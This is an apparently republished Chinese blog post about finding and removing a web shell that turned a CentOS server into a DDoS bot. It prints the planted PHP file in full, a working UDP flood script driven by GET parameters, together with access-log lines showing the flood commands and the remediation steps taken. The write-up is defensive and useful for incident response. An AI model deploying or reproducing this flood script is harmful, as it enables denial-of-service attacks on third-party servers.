今天早上五點,收到監(jiān)控寶的警告短信,說是網(wǎng)站M無法訪問了。睡的正香,再說網(wǎng)站所在系統(tǒng)是centos,重要數(shù)據(jù)每天都備份,應(yīng)該很安全,也沒有在意。倒頭接著睡覺去了。
早上九點,機房負責(zé)人直接給我打來電話,說是全機房網(wǎng)絡(luò)巨慢,單位的所有網(wǎng)站都打不開或打開的很慢。Centos服務(wù)器被掛馬的一次抓馬經(jīng)歷。
我趕緊趕了過去,查看了一下那里網(wǎng)絡(luò),發(fā)現(xiàn)175服務(wù)總是以50M/S速度向外發(fā)包,而175服務(wù)器正是網(wǎng)站M所在的服務(wù)器。
果斷SSH連接175服務(wù)器,發(fā)現(xiàn)175服務(wù)器連接也很慢,連上之后top一下,查看cpu負載:
top
發(fā)現(xiàn)有兩個apache進程占用cpu一直在40%以上,馬上停止httpd 服務(wù)
|
1
|
service httpd stop |
停止httpd服務(wù)之后,再看網(wǎng)絡(luò)狀態(tài),175服務(wù)器也不向外發(fā)包了,一切正常。
由此判斷應(yīng)該是175服務(wù)器掛了馬,瘋狂向外發(fā)包,擠占了全部機房帶寬。
下一步就是抓馬了!
175服務(wù)器是有硬件防火墻,只開http80跟ssh22端口,ssh不太可能被盜號,應(yīng)該是通過web漏洞掛馬。早上5點才中招的,木馬程序文件應(yīng)該在1天之內(nèi)。
切到M站點根目錄之下,查找最近一天內(nèi)變動的文件,執(zhí)行
|
1
|
find ./ -mtime -1 |
果然,一個名為phzLtoxn.php的可疑文件出現(xiàn)在目錄列表中。查看一下木馬程序的創(chuàng)建者,執(zhí)行
|
1
|
ls -l phzLtoxn.php |
這里發(fā)現(xiàn)文件就沒了,難道這文件還會自我銷毀?Centos服務(wù)器被掛馬的一次抓馬經(jīng)歷
原來發(fā)生了一個小插曲,隔壁的管理員小黃也注意到這個文件,二話不說就刪除了。我過去劈頭批評教育了小黃一頓。見了木馬程序就知道刪刪刪刪!難道木馬程序不會再生成啊?你得順藤摸瓜,不是一刀切。你得找到漏洞源頭!刪了沒辦法,再把httpd服務(wù)開啟了,引狼入室,等等看能否再生成。
果然,半小時不到,新的phzLtoxn.PHP文件又生成了。查看了一下,文件創(chuàng)建者是apache,由此判斷這肯定是通過網(wǎng)站漏洞上傳的。
分析一下木馬文件,看下黑客意圖
這里貼出phzLtoxn.php文件源代碼,并作了簡單注釋,僅作學(xué)習(xí)之用。
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
|
<?php//設(shè)置腳本運行時間set_time_limit(999999);//攻擊目標(biāo)服務(wù)器ip$host = $_GET['host'];//攻擊目標(biāo)服務(wù)器端口$port = $_GET['port'];//攻擊時長$exec_time = $_GET['time'];//每次發(fā)送字節(jié)數(shù)$Sendlen = 65535;$packets = 0;//設(shè)置客戶機斷開不終止腳本的執(zhí)行ignore_user_abort(TRUE);//step1. 目標(biāo)服務(wù)器$host、端口$port、運行時長$exec_time有效性if (StrLen($host) == 0 or StrLen($port) == 0 or StrLen($exec_time) == 0) { if (StrLen($_GET['rat']) <> 0) { echo $_GET['rat'] . $_SERVER["HTTP_HOST"] . "|" . GetHostByName($_SERVER['SERVER_NAME']) . "|" . php_uname() . "|" . $_SERVER['SERVER_software'] . $_GET['rat']; exit; } echo "Warning to: opening"; exit;}//step2. 設(shè)定發(fā)字符串$out,這里是“AAAAAAAAAA...”for ($i = 0; $i < $Sendlen; $i++) { $out .= "A";}$max_time = time() + $exec_time;//step3. 進行攻擊,使用udp向目標(biāo)服務(wù)器狠狠發(fā)串串while (1) { $packets++; if (time() > $max_time) { break; } $fp = fsockopen("udp://$host", $port, $errno, $errstr, 5); if ($fp) { fwrite($fp, $out); fclose($fp); }}//step4. 攻擊統(tǒng)計echo "Send Host $host:$port<br><br>";echo "Send Flow $packets * ($Sendlen/1024=" . round($Sendlen / 1024, 2) . ")kb / 1024 = " . round($packets * $Sendlen / 1024 / 1024, 2) . " mb<br><br>";echo "Send Rate " . round($packets / $exec_time, 2) . " packs/s" . round($packets / $exec_time * $Sendlen / 1024 / 1024, 2) . " mb/s";?> |
從以上代碼可以看出,是個典型的ddos攻擊代碼。黑客應(yīng)該是把我們服務(wù)器當(dāng)傀儡使用,組織大量傀儡服務(wù)器瘋狂向目標(biāo)服務(wù)器發(fā)包。黑客只需要打開瀏覽器,敲入http://M站域名.com//phzLtoxn.php?host=x.x.x.x&port=xx&time=xx就可以對目標(biāo)服務(wù)器進行ddos攻擊了。
查看httpd日志,分析下攻擊ip源,執(zhí)行
|
1
2
|
tail /var/log/httpd/access.log | grep phzLtonxn.php183.12.75.240 - - [10/Aug/2012:10:38:46 +0800] "GET /phzLtoxn.php?host=174.139.81.91&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"110.185.121.167 - - [10/Aug/2012:10:38:56 +0800] "GET /phzLtoxn.php?host=218.93.248.98&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"110.185.121.167 - - [10/Aug/2012:10:38:58 +0800] "GET /phzLtoxn.php?host=198.148.89.34&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"110.185.121.167 - - [10/Aug/2012:10:39:08 +0800] "GET /phzLtoxn.php?host=199.119.207.133&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"110.185.121.167 - - [10/Aug/2012:10:39:12 +0800] "GET /phzLtoxn.php?host=174.139.81.91&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"118.161.219.152 - - [10/Aug/2012:10:39:27 +0800] "GET /phzLtoxn.php?host=198.148.89.34&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"118.161.219.152 - - [10/Aug/2012:10:39:27 +0800] "GET /phzLtoxn.php?host=174.139.81.91&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"118.161.219.152 - - [10/Aug/2012:10:39:27 +0800] "GET /phzLtoxn.php?host=199.119.207.133&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"118.161.219.152 - - [10/Aug/2012:10:39:27 +0800] "GET /phzLtoxn.php?host=218.93.248.98&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"118.161.219.152 - - [10/Aug/2012:10:39:28 +0800] "GET /phzLtoxn.php?host=61.164.148.49&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)" |
發(fā)現(xiàn)源ip來自多個,目標(biāo)服務(wù)器ip也有多個,都屬于很多國家,有點奇怪啊,為什么黑客有針對性的攻擊呢,無聊的黑客啊。
下一步,找漏洞!
1、重新審視了M站目錄下文件權(quán)限。僅對幾個必要的緩存、靜態(tài)化的目錄為apache開啟了寫權(quán)限,防止phzLtoxn.php文件再次生成。
2、重新開啟httpd服務(wù),使用360網(wǎng)站檢測 http://webscan.360.cn/ 對H站進行漏洞檢測,發(fā)現(xiàn)H站中有嚴(yán)重的遠程執(zhí)行漏洞,于是趕緊打了補丁。
3、補丁打好之后,順便修改了系統(tǒng)用戶、數(shù)據(jù)庫用戶、ftp用戶的密碼、M站系統(tǒng)用戶密碼。
觀察幾日之后,一切正常。
小結(jié)一下幾個安全原則
1、權(quán)限最小化。
web目錄一定做好權(quán)限,僅僅對apache開幾個必要文件夾的寫權(quán)限。
2、時刻注意補丁更新。
經(jīng)常使用第三方的網(wǎng)站安全檢測工具,如http://webscan.360.cn,也可參考十大安全評估工具,如果網(wǎng)站系統(tǒng)使用了第三方常用程序,多注意一下烏云漏洞平臺的信息http://www.wooyun.org/。
3、中招后一定要補牢。
別光刪刪刪刪,要查找中招源頭,分析黑客目的。
這是還是請大牛小牛們分析一下,為什么這幫黑客用那么多的肉雞來ddos攻擊不同的服務(wù)器,而這些被ddos攻擊的服務(wù)器之間卻沒有什么聯(lián)系。為什么攻擊沒有針對性?難道是為了耗帶寬玩?!
原文鏈接:http://blog.csdn.net/qq_21439971/article/details/54631440
